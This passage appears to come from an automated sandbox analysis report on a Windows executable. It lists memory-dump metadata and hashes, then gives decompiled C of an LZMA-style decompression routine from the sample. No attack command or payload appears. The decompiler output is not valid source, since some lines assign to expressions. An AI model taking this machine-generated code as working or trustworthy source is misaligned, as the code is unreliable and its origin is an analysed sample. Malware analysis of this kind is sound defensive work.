                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406595
                                                                                                                          0x00406595
                                                                                                                          0x00406595
                                                                                                                          0x00406599
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040659f
                                                                                                                          0x004065a2
                                                                                                                          0x004065a5
                                                                                                                          0x004065a8
                                                                                                                          0x004065aa
                                                                                                                          0x004065aa
                                                                                                                          0x004065aa
                                                                                                                          0x004065ad
                                                                                                                          0x004065b0
                                                                                                                          0x004065b3
                                                                                                                          0x004065b6
                                                                                                                          0x004065b9
                                                                                                                          0x004065bc
                                                                                                                          0x004065bd
                                                                                                                          0x004065bf
                                                                                                                          0x004065bf
                                                                                                                          0x004065bf
                                                                                                                          0x004065c2
                                                                                                                          0x004065c5
                                                                                                                          0x004065c8
                                                                                                                          0x004065cb
                                                                                                                          0x004065ce
                                                                                                                          0x004065d2
                                                                                                                          0x004065d4
                                                                                                                          0x004065d7
                                                                                                                          0x00000000
                                                                                                                          0x004065d9
                                                                                                                          0x00406356
                                                                                                                          0x00406356
                                                                                                                          0x00000000
                                                                                                                          0x00406356
                                                                                                                          0x004065d7
                                                                                                                          0x0040680c
                                                                                                                          0x0040682e
                                                                                                                          0x00406834
                                                                                                                          0x00406836
                                                                                                                          0x0040683d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405e3b
                                                                                                                          0x00406843
                                                                                                                          0x00406843
                                                                                                                          0x00000000

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 797fef13bb3e8e171cff3cae9b41bd7abdeca14a353df9249488f574514014e3
                                                                                                                          • Instruction ID: 0ba87498709856dc17a0c5f751d6ecfe3ae25d7b1153355424f504aba8ac83cf
                                                                                                                          • Opcode Fuzzy Hash: 797fef13bb3e8e171cff3cae9b41bd7abdeca14a353df9249488f574514014e3
                                                                                                                          • Instruction Fuzzy Hash: B4817772D04229CBDF24CFA8C8447AEBBB0FB44305F25816AD856BB2C0D7785A86DF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406247, Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00406247() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M0040684B))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8)); // executed
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t621 - 0x88) = _t542;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
